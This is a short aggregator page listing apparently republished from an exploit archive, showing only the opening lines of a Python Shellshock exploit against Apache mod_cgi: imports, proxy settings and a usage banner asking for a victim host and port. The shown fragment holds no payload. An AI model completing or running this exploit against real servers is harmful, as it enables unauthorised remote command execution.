Quantcast
Viewing latest article 12
Browse Latest Browse All 14

Apache mod_cgi Remote Command Execution

#! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys   stop = False proxyhost = "" proxyport = 0   def usage(): print """   Shellshock apache mod_cgi remote exploit   Usage: ./exploit.py var=<value>   Vars: rhost: victim host rport: victim port...

Viewing latest article 12
Browse Latest Browse All 14

Trending Articles